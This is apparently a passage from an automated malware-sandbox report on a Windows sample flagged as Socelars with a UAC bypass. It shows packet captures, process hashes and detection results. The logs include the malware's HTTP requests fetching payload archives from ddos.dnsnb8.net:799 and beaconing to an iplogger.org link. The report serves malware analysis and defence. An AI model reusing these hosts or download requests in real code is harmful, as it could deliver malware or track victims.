data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_KUn2QqA8onBtTl2dDA+Tc0sz9jjFS4GTWhTuJb4r9BkmG1pUIXKakwDuxn+OreG1D5yjyP5yvVtaScxD+iKZeA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-wid
Jul 24, 2024 17:33:02.603635073 CEST	1236	IN	Data Raw: 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 69 63 6f 64 65 70 73 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 Data Ascii: th, initial-scale=1, shrink-to-fit=no"/> <title>icodeps.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;width: 13px;height: 12px;displ
Jul 24, 2024 17:33:02.603648901 CEST	1236	IN	Data Raw: 0a 0a 2e 68 65 61 64 65 72 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 72 65 6d 20 31 72 65 6d 20 30 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 38 34 38 34 38 Data Ascii: .header { padding:1rem 1rem 0; overflow:hidden;}h1 { color:#848484; font-size:1.5rem;}.header-text-color:visited,.header-text-color:link,.header-text-color { color:#848484;}.comp-is-parked { margin: 4px 0 2px
Jul 24, 2024 17:33:02.606439114 CEST	1236	IN	Data Raw: 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 38 34 38 34 38 34 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a Data Ascii: { color: #848484; } .comp-sponsored { margin-left: 0; } .wrapper1 { max-width:1500px; margin-left:auto; margin-right:auto; } .wrapper2 { background:url('//d38psrni17bvxu.c
Jul 24, 2024 17:33:02.606453896 CEST	1236	IN	Data Raw: 47 67 39 49 6a 49 30 49 6a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 43 41 77 61 44 49 30 64 6a 49 30 53 44 42 36 49 69 42 6d 61 57 78 73 50 53 4a 75 62 32 35 6c 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 55 75 4f 44 67 67 4e 43 34 Data Ascii: Gg9IjI0Ij48cGF0aCBkPSJNMCAwaDI0djI0SDB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTUuODggNC4xMkwxMy43NiAxMmwtNy44OCA3Ljg4TDggMjJsMTAtMTBMOCAyeiIvPjwvc3ZnPg==');}</style> </head><body id="afd"><div id="plBanner"><script id="parklogic" type="t
Jul 24, 2024 17:33:02.609065056 CEST	1236	IN	Data Raw: 62 65 72 27 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 6f 6e 74 2d 53 69 7a 65 73 20 61 6e 64 20 4c 69 6e 65 2d 48 65 69 67 68 74 73 0a 20 20 20 20 20 20 20 20 27 66 6f 6e 74 53 69 7a 65 41 74 74 72 69 62 75 74 Data Ascii: ber': 3, // Font-Sizes and Line-Heights 'fontSizeAttribution': 14, 'fontSizeTitle': 24, 'lineHeightTitle': 34, // Colors 'colorAttribution': '#aaa', 'colorTitleLink': '#0277bd',
Jul 24, 2024 17:33:02.609078884 CEST	776	IN	Data Raw: 57 45 31 59 54 42 6a 59 7a 4e 38 66 48 78 38 66 44 46 38 66 44 42 38 4d 48 78 38 66 48 77 78 66 48 78 38 66 48 77 77 66 44 42 38 66 48 78 38 66 48 78 38 66 48 78 38 4d 48 77 77 66 48 77 77 66 48 78 38 4d 48 77 77 66 46 63 78 4d 44 31 38 66 44 46 Data Ascii: WE1YTBjYzN8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXxjNTQ2MjU2MDIxYjgxYzM5YmFiOWRiMGY3NWEzYWFiNmYzN2FhNjlhfDB8ZHAtdGVhbWludGVybmV0MDlfM3BofDB8MHx8fA=='; var domain='icodeps.com'; var scriptP
Jul 24, 2024 17:33:02.609091043 CEST	1236	IN	Data Raw: 72 6d 4c 65 6e 67 74 68 27 3a 20 34 30 2c 27 61 64 74 65 73 74 27 3a 20 74 72 75 65 2c 27 63 6c 69 63 6b 74 72 61 63 6b 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 0d 0a 31 30 30 30 0d 0a 68 6f 73 74 20 2b 20 27 2f 74 72 61 Data Ascii: rmLength': 40,'adtest': true,'clicktrackUrl': '//' + location.1000host + '/track.php?','attributionText': 'Ads','colorAttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttributi
Jul 24, 2024 17:33:02.611963987 CEST	1236	IN	Data Raw: 61 64 65 64 43 61 6c 6c 62 61 63 6b 54 72 69 67 67 65 72 65 64 20 3d 20 74 72 75 65 3b 69 66 20 28 28 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 3d 3d 3d 20 74 72 75 65 20 7c 7c 20 73 74 61 74 75 73 2e 66 61 69 6c 6c 69 73 74 65 64 20 Data Ascii: adedCallbackTriggered = true;if ((status.faillisted === true \|\| status.faillisted == "true" \|\| status.blocked === true \|\| status.blocked == "true" ) && status.error_code != 25) {ajaxQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(
Jul 24, 2024 17:33:02.611979961 CEST	1236	IN	Data Raw: 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 Data Ascii: Query(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=needsreview&uid=" + encodeURIComponent(uniqueTrackingID));}if ((status.adult === true \|\| status.adult == "true") && !isAdult) {ajaxQuery(scriptPath + "/track
Jul 24, 2024 17:33:02.614866018 CEST	1236	IN	Data Raw: 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 61 6e 73 77 65 72 63 68 65 63 6b 26 61 6e 73 77 65 Data Ascii: track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=answercheck&answer=rejected&uid=" + encodeURIComponent(uniqueTrackingID));}}};var x = function (obj1, obj2) {if (typeof obj1 != "object")obj1 = {};for (var key in obj2)obj1[key]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49704	44.221.84.105	799	2876	C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:03.514079094 CEST	288	OUT	GET /cj//k2.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49705	44.221.84.105	799	2876	C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:06.272958994 CEST	288	OUT	GET /cj//k3.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49706	44.221.84.105	799	2876	C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:09.072983980 CEST	288	OUT	GET /cj//k4.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49708	44.221.84.105	799	2876	C:\Users\user\AppData\Local\Temp\MDSxhU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 24, 2024 17:33:12.026657104 CEST	288	OUT	GET /cj//k5.rar HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ddos.dnsnb8.net:799 Connection: Keep-Alive

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	172.232.25.148	443	3212	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 15:33:00 UTC	193	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: www.icodeps.com Cache-Control: no-cache
2024-07-24 15:33:00 UTC	315	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Wed, 24 Jul 2024 15:33:00 GMT Content-Type: text/html Content-Length: 142 Connection: close Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.icodeps.com/ Cache-Control: no-store, max-age=0
2024-07-24 15:33:00 UTC	142	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49703	172.67.132.113	443	3212	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 15:33:03 UTC	196	OUT	GET /1NpYz7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Host: iplogger.org Cache-Control: no-cache
2024-07-24 15:33:03 UTC	1030	IN	HTTP/1.1 200 OK Date: Wed, 24 Jul 2024 15:33:03 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 34765079137263905=1; expires=Thu, 24 Jul 2025 15:33:03 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=8.46.123.33; expires=Thu, 24 Jul 2025 15:33:03 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict memory: 0.41240692138671875 expires: Wed, 24 Jul 2024 15:33:03 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=31536000 x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEXAO7DJe20H%2BZ2xyrxBItk6AZc5qYiyz24%2FVqDGT%2BGrk7Ugfy9AvmErMh9W%2F8x84vySyJEcdk8R9%2F%2B0%2FmGZsd8f5A6H3BcgjaBj5kVWzTZL5bc3kXZwArQJ6lJ9WfY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a84f767bc178c1b-EWR alt-svc: h3=":443"; ma=86400
2024-07-24 15:33:03 UTC	122	IN	Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
2024-07-24 15:33:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	4
Start time:	11:32:56
Start date:	24/07/2024
Path:	C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exe"
Imagebase:	0xb10000
File size:	1'803'264 bytes
MD5 hash:	7BB46178F57F6EA01347B1790D7BFA27
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.1333766493.0000000000C56000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000004.00000000.1333716533.0000000000C2A000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	11:32:56
Start date:	24/07/2024
Path:	C:\Users\user\AppData\Local\Temp\MDSxhU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\MDSxhU.exe
Imagebase:	0xad0000
File size:	15'872 bytes
MD5 hash:	F7D21DE5C4E81341ECCD280C11DDCC9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	11:33:05
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3212 -s 2052
Imagebase:	0xdd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	11:33:20
Start date:	24/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2876 -s 1524
Imagebase:	0xdd0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true